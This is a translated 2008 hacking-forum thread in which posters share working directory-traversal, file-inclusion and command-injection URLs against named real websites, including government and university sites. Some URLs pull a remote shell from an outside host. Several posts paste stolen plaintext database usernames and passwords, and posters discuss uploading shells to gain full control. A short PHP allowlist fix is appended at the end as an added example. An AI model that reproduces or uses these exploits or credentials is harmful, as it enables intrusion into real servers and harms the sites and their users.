http://www.competeprosper.ca/download.php?file=../../../../../../../etc/passwd
=
http://www.orlandoedc.com/core/file.php?loc=../../../etc/passwd
http://www.orlandoedc.com/core/file.php?loc=../../../etc/rc.d/init.d/httpd
http://www.orlandoedc.com/core/file.php?loc=../../../etc/httpd/conf/httpd.conf
http://www.orlandoedc.com/core/file.php?loc=../../../proc/version
.Striker
15.05.2008, 08:57
http://www.mvastro.org/members/newsletter.php?file=../../../../../../../../../../../etc/passwd
~!DoK_tOR!~
17.05.2008, 12:24
http://www.potpourri-sarl.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00
http://www.vastkust-dental.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00
.Striker
19.05.2008, 16:26
http://pes.inf.puc-rio.br/pes06_1_1/cel/aplicacao/showSource.php?file=/etc/my.cnf
http://pes.inf.puc-rio.br/pes06_1_1/cel/aplicacao/showSource.php?file=/etc/passwd
http://www.mcmrdd.org/site//modules/FileManager/postlet/uploader.php?inc=../../../../../../../etc/passwd
.Striker
20.05.2008, 16:58
http://www.centerforcommunityleadership.com/static/centerforcommunityleadership/newsletter.php?file=../../../../../../../../../../../etc/passwd
http://www.centerforcommunityleadership.com/static/centerforcommunityleadership/newsletter.php?file=../../../../../../../../../../../etc/my.cnf
~!DoK_tOR!~
22.05.2008, 19:01
dunno, possibly a repost; the PHP anti-repost checker isn't working (
http://asiane.byu.edu/arabic/index.php?content=/etc/passwd%00
http://sophie.byu.edu/resources/index.php?p=../../../../../../../etc/passwd
.Striker
22.05.2008, 20:17
http://zerowebsites.com/index.php?page=../../../../../../../../../../../etc/passwd
http://www.precisionelectricllc.com/index.php?page=../../../../../../../../../../../etc/passwd
baltazar
22.05.2008, 23:04
http://www.wiscnews.com/archives/read.php?info=../../etc/passwd
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://forum.anime-club.ro/main.php?m=../../../../../etc/passwd%00
http://www.sasha.by/doc2.php?page=../../../../../etc/passwd
http://abw.by/?act=/etc/passwd%00
.Striker
23.05.2008, 16:44
http://www.just-tea.com.tw/teashop/justtea_wish.php?file=../../../../../../../boot.ini
Microsoft Windows 2000 Professional ))))
Anyway, I decided to sort through my bookmarks in Opera, since so much junk has piled up...
http://www.3utelecom.com/index.php?include=/etc/passwd
an include, can't be taken any further
http://www.anc.org.za/caucus/index.php?include=index.php
some kind of wonky file reader
http://sbe.comu.edu.tr/index.php?sosbil=index.php
local include + safe mode on the server
http://ax2.old-cans.com/index.php?include=robots.txt
local include. There's an info.php file next to it, and allow_url_fopen=On apparently, but it refuses to include remote files =\
http://www.elementalafrica.org.za/index.php?include=index.php
file reader
http://www.clan-dl.sk/index.php?include=index.php
local include
http://www.highqsoft.com/index.php?include=../index.php
file reader 0_o
http://www.pnosker.com/index.php?include=.htaccess
either a reader or an include, didn't go into details
http://kompaktservice.com/index.php?include=index.php
local include
http://www.flexsys-group.co.uk/index.php?include=.htaccess
and again a local include
http://klassenmanagement.com/index.php?include=../../../../../../../../etc/passwd%00
a reader or an include, I don't remember
http://www.spa-nyc.com/custompage.php?include=/etc/passwd
a local include
http://www.overseaspropertybroker.com/index.php?include=index
also a local include
http://www.machinery-food.com/index.php?include=/etc/passwd%00
local include
http://www.wittmann-weingut.de/kk_templates/index.php?INCLUDE=../
local include
http://www.worldaccessnet.com/index.php?include=../../../../../../../../../../etc/passwd/%00
local include
Ded MustD!e
25.05.2008, 08:01
http://www.kiva.org/ PR:7
myphpbb.com.ru
http://myphpbb.com.ru/?q=sinc/sconfig.dat&c=include('http://www.ru/shell.txt');die();
.Striker
25.05.2008, 15:13
Ded MustD!e
25.05.2008, 17:20
http://photos.gavintech.com the output is nicely formatted, pleasant to read
.Striker
25.05.2008, 21:22
Ded MustD!e
26.05.2008, 00:45
http://www.verwirrend.de/
http://www.verwirrend.de/showsource.php?file=../../../../../../../../../../etc/passwd
.Striker
26.05.2008, 22:33
usina.com
.Striker
29.05.2008, 00:06
bteb-bd.org
managed to pull the DB info with the file reader
$host = "mysql229.secureserver.net";
$dbusername = "btebonline";
$dbpassword = "btebreg";
$dbname = "btebonline";
and
;)
http://www.bnieast.com/cgi-bin/db.pl?h=../../../../../../etc/passwd%00
.Striker
31.05.2008, 11:25
+
admin accounts for the site
http://www.clfns.com/news/file.php?file=../../data/users.db.php
http://www.phaneuf.net/newsletter/newsletter_list.cgi?action=single&p=&filename=|uname -a|&title=&titlefile=|id|
=\
.Striker
05.06.2008, 14:44
http://www.mscorecard.com/mscorecard/getfile.php?file=../../../../../../../../../../../etc/passwd
database
( $db = mysql_connect("mysql3.nebula.fi", "velocor", "2xAaQf7M") or die ("Error connecting to database.");
mysql_select_db("velocor", $db) or die ("Error connecting to database.");
)
http://2010.cshl.edu/scripts/main2.pl?link=project&content=|uname -a|
there seem to be no writable folders here =)
http://dev.eurac.edu:8080/cgi-bin/index/info.pl?fname=|find$IFS/home/ostreiter/local/apache/$IFS-perm$IFS-2$IFS-ls|
there are folders here, could try uploading a Perl shell =\
~!DoK_tOR!~
06.06.2008, 12:07
=\\
http://dblife.cs.wisc.edu/markUpDBWorld.cgi?fileName=../../../../../../../../../../etc/passwd%00
.Striker
06.06.2008, 14:10
http://www.ph3.org/fdload.php?file=../../../../../../../../../../../etc/passwd
hm, database )
($storeConfig['type'] = 'mysqlt';
$storeConfig['hostname'] = 'localhost';
$storeConfig['database'] = 'ph3org_gallery';
$storeConfig['username'] = 'ph3org_onsec';
$storeConfig['password'] = '4x4pajer0';
$storeConfig['tablePrefix'] = 'g2_';
$storeConfig['columnPrefix'] = 'g_';)
http://dev.eurac.edu:8080/cgi-bin/index/info.pl?fname=|find$IFS/home/ostreiter/local/apache/$IFS-perm$IFS-2$IFS-ls|
I've had this link in my PMs since November of last year :) No matter how much I wrestled with it, I never managed to upload anything...
I had a look: the folder where the info.pl script lives already has uploaded Perl shells, but when you try to run them you get "service temporary unavailable"
baltazar
08.06.2008, 23:17
:)
August12
17.06.2008, 02:53
Serbia
http://www.b92.net:80/forcedl.php?file=../../../../../../../../../../../../../etc/passwd
http://www.b92.net:80/forcedl.php?file=../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf
Russia
http://letitbit.net:80/?vote_cr=../../../../../../../../etc/passwd%00
http://www.allsidige.no/elementer.php?file=[INCLUDE]
http://www.cdb.com.kh/index.php?url=[INCLUDE]
http://www.elma.se/index.php?url=[INCLUDE]
http://www.pqfilm.ru/head.php?id=23&file=[INCLUDE]
_http://www.postnuke.ru/index.php?module=Static_Docs&type=user&func=view&f=../
#urbaner
18.06.2008, 08:34
http://www.indianstudios.net/rotterdamfilmfestival.php?id=[INCLUDE]
This looks like an injection.
~!DoK_tOR!~
19.06.2008, 16:49
This looks like an injection.
there's no injection here, mister
.Striker
24.06.2008, 17:23
www.iauneka.ac.ir
DJ ][akep
25.06.2008, 15:01
_http://www.postnuke.ru/index.php?module=Static_Docs&type=user&func=view&f=../
Or better, go here; no shell even needed, full root :cool:
http://www.postnuke.ru/index.php?module=Static_Docs&func=view&f=../../../../../../../../../../../../../../
http://www.kasseler-cms.net/index.php?module=phpManual&file=../../../../../../../../../../../etc/passwd
.Striker
27.06.2008, 12:44
PR 5
http://www.socialweb.be/nl/archieven/index.php?File=../../../../../../../../../../../etc/passwd%00
http://www.serviceformulaire.fr/html/menu.phtml?page=[INCLUDE]
http://iron-brigade.org/btech/html/page.php?fichier=[INCLUDE]
http://bagowei.free.fr/_php/contener.php?path=..%2F..%2F&file=[INCLUDE]&title=Bagoweiremote including
close to a hundred users, and each user is possibly a "site"
but what's the use...
but the include is useful... you can read files.. so you can read configs.. from there you can get the paths to these sites' home directories, then look for holes and eventually upload a shell to that damn server... and then do whatever your heart desires =)
1) http://www.ejls.eu/download.php?file=../etc/passwd
No matter how long I struggled, I couldn't find the paths to the configs; I took the paths from here:
https://forum.antichat.ru/thread49775.html
2) http://www.jff.org/download.php?file=../index.php
$hostname_JFF = "localhost";
$database_JFF = "jff_content";
$username_JFF = "jff_contentReade";
$password_JFF = "^&%623kjlfsdf_$43";
and
<?php
function connectToDatabase() {
$dbh=mysql_connect ("localhost", "helpuc_helpuc2hu", "xd1iqXSO9m")
or die ('I cannot connect to the database because: ' . mysql_error());
mysql_select_db ("helpuc_helpuc2helpuconnect");
}
function query ($sql)
{
$query_result=mysql_query($sql) or die("Couldn't execute following query:<b>".$sql."</b> because of".mysql_error());
if (!$query_result) return (0);
$out=array();
// if (mysql_num_rows($query_result)>1) {
while ($value=@mysql_fetch_array($query_result,MYSQL_ASSOC)) $out[]=$value;
//} else $out=@mysql_fetch_array($query_result,MYSQL_ASSOC);
if (count ($out)>=1) return ($out);else return $query_result;
}
?>
fyidirectoriesofamerica.com
http://www.fyidirectoriesofamerica.com/index.php?page=../../../../../../../../etc/passwd
www.imperialhoods.com PR 4 ;)
http://www.imperialhoods.com/index.php?module=company_info&page=../../../../../etc/passwd
www.planetjerry.com
http://www.planetjerry.com/index.php?page=../../../../../../../etc/passwd&qn=2
http://pocash.net/pocash.php?page=./../../../etc/passwd
baltazar
02.07.2008, 16:30
from my archive:
baltazar
02.07.2008, 16:31
.Striker
03.07.2008, 16:10
When did you last check these?
I checked more than ten links and not one of them is still valid
baltazar
07.07.2008, 17:56
baltazar
10.07.2008, 12:11
http://www.ccbtools.com/support/index.php?include_file=../../../../../etc/passwd
http://www.gregf.org/dotfiles/show_file?file=../../../../../../etc/passwd
http://www.clan-webs.net/zone/index.php?include_file=../../../../../../etc/passwd
http://minipc.org/safepup/index.php?file=../../../../../../../../../../../../etc/passwd
_http://www.preko.kz/articles.php?a=../../../../etc/passwd
www.seeui.co.kr
http://www.seeui.co.kr/down.php?mode=1&fn=[LOCAL_FILE]
Managed to download a small part of the site's structure. Was too lazy to dig further ;)
Site: http://uafile.com/857198
aka PSIH
14.07.2008, 19:38
_http://www.littlewoodscasino.com/online-casino/affiliates/review.php?review=../../../../../../../../etc/passwd
.Striker
14.07.2008, 19:55
pr 4
http://www.fonprevial.org.co/download.php?file=../../../../../../../../../../../etc/passwd
a dumb file reader
https://secure4.olemiss.edu/umpolicyopen/GetPdfActive?pol=10967301&ver=active&file=../../../../../../../../../../../etc/passwd%00.pdf
http://badisow.49.212-215.is74.ru/userdir/message/messread.php?tm=c://windows
you can browse around the whole computer ...
PS: The site is on a local network, but it can also be reached from the internet
This doesn't look like a PHP injection
http://www.jfrealtors.com/index.php?page=../../../../etc/passwd
Everything is out in the open)
http://darryl-e.com/pagegen.php?page=[ url ]
http://www.grammi.edu.gr/gr/index.php?page=[ url ]
.Striker
15.07.2008, 19:44
http://www.grammi.edu.gr/gr/index.php?page=[ url ]
this is not an injection
it just inserts it into a frame
aka PSIH
16.07.2008, 21:17
gov, pr9
http://www.mbda.gov/?section_id=12&bucket_id=916&content_id=6204&well=entire_page&textsize=Medium&method=printer&portal_document_download=true
&download_cid=6204&name=../../../../../../../../../etc/passwd&legacy_flag=false
gov, pr7
http://www.mass.gov/?pageID=mg2subtopic&L=4&L0=../../../../../../../../../etc/passwd%00&L1=Resident&L2=Housing
&L3=Buying+a+Home&sid=massgov2
.Striker
23.07.2008, 22:41
http://zwgkml.harbin.gov.cn/hrb_zwgkml/file.php?filename=../../../../../../../../../../../etc/passwd
File reader
http://www.factordinero.com.co/docs/download.php?file=download.php
.Striker
25.07.2008, 19:03
http://www.uaemet.gov.ae/upload/filedownload_backend.php?file=../../../../../../../../../../../etc/passwd
http://www.telcat-starclub.de/cgi-bin/parse.pl?file=../../../../../../../../../../../etc/passwd
http://www.netstor.com.tw/dl.php?file=../../../../../../../../../../../etc/passwd
liveinternet.ru
By all indications there is an include; a pity that the server configuration does not allow this bug to be used
http://www.liveinternet.ru/stat/index.html?lang=./././en
well, look:
we enter:
http://www.liveinternet.ru/stat/index.html?lang=./././en
and at the top right we see:
{currentName} Русский
at the top left:
LiveInternet • site statistics
in English.
now we enter this:
http://www.liveinternet.ru/stat/index.html?lang=./././en./././
this is in case ./ gets stripped out.
We see that the language became Russian, which means the default was used, so an error occurred.
If you put ./././ before the name (a dot being the current directory), there is no error
we enter:
http://www.liveinternet.ru/stat/index.html?lang=./././es
and the language is Spanish.
And it cannot be exploited, because the null byte is filtered and something is appended at the end. And at the start too. That is, it is possible to include (or read) files with the same extension as the language files
otmorozok428
29.07.2008, 16:52
"Rabotnitsa" - a magazine for family reading
Vulnerable code in the file part.php:
include($rubr.".php");
Usage:
http://www.rabotnitsa.ru/part.php?rubr=http://www.yoursite.com/shell
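The unsanitized include quoted above, rewritten with an allowlist. This is an added example, not part of the original post or the site's code; the section names, the `sections` directory and the helper `resolve_section()` are hypothetical.

```php
<?php
// Before (as quoted in the post): the request parameter goes straight
// into include, so the caller chooses which file PHP executes.
//   include($rubr.".php");

// After: the parameter only selects from a fixed list of known sections.
// Hypothetical names; the real site's sections are not given on the page.
const ALLOWED_SECTIONS = ['news', 'recipes', 'archive'];
const SECTION_DIR = __DIR__ . '/sections';

/**
 * Map the request parameter to a file path.
 * Returns null for anything that is not an exact allowlist entry.
 */
function resolve_section($rubr)
{
    // ?rubr[]=x arrives as an array; reject every non-string value.
    if (!is_string($rubr)) {
        return null;
    }
    // Strict match against the allowlist: a URL, "../" or "./" prefixes
    // and null bytes can never equal one of the listed names.
    if (!in_array($rubr, ALLOWED_SECTIONS, true)) {
        return null;
    }
    // The path is built only from constants plus an allowlisted name.
    return SECTION_DIR . '/' . $rubr . '.php';
}

$path = resolve_section(isset($_GET['rubr']) ? $_GET['rubr'] : null);
if ($path === null || !is_file($path)) {
    http_response_code(404);
    exit('Not found');
}
include $path;
```

Keeping `allow_url_include = Off` in php.ini is a second layer: even if an unchecked include slips through elsewhere, PHP will refuse to include a remote URL.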